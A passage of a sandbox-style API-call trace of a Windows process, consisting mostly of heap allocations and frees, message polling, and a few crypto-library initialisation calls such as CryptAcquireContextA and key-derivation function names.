0x2e54b28 [0181.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0181.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0181.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0181.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0181.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0181.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0181.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0181.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0181.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0181.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0181.902] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0181.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0181.902] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0181.902] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.902] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0181.903] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0181.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69a48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0181.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0181.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69b88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0181.903] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0181.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0181.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0181.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0181.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0181.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0181.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0181.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0181.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0181.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0181.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0181.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0181.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0181.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0181.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0181.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0181.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0181.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0181.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0181.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0181.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0181.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0181.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0181.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0181.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0181.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0181.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0181.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0181.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0181.906] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0181.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0181.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0181.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0181.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0181.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0181.906] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0181.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0181.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0181.906] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0181.906] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0181.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0181.906] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0181.906] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0181.906] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0181.907] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0181.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff10 [0181.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0181.907] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0181.907] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0181.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0181.907] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0181.907] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0181.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0181.907] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0181.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0181.907] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0181.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0181.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0181.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0181.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0181.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0181.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0181.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0181.908] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0181.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0181.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0181.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0181.908] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0181.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0181.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0181.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0181.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bf8 [0181.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0181.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0181.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0181.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0181.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0181.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b28 [0181.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0181.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0181.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0181.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0181.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0181.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0181.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0181.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0181.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0181.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0181.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0181.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0181.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0181.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0181.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0181.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0181.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0181.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0181.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0181.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0181.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0181.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0181.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0181.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0181.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0181.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0181.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0181.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0181.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0181.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0181.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0181.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0181.910] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0181.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0181.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0181.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0181.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0181.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0181.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0181.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0181.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0181.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0181.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0181.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0181.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0181.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0181.910] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0181.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0181.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0181.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0181.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0181.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0181.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0181.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0181.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0181.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0181.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0181.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0181.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0181.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0181.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0181.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0181.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0181.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0181.911] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0181.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0181.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0181.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0181.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0181.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0181.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0181.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0181.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0181.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0181.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0181.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0181.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0181.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0181.912] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0181.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0181.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0181.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0181.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0181.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0181.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0181.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0181.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0181.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0181.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0181.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0181.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0181.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0181.912] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0181.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0181.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0181.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0181.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0181.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0181.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0181.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0181.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0181.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0181.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0181.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0181.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0181.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0181.913] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0181.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0181.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0181.913] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0181.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0181.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0181.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0181.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0181.914] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0181.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0181.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0181.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0181.915] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0181.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0181.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0181.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0181.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0181.915] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0181.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0181.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0181.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0181.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0181.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0181.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0181.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0181.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0181.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0181.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0181.915] HeapFree (in: hHeap=0x970000, 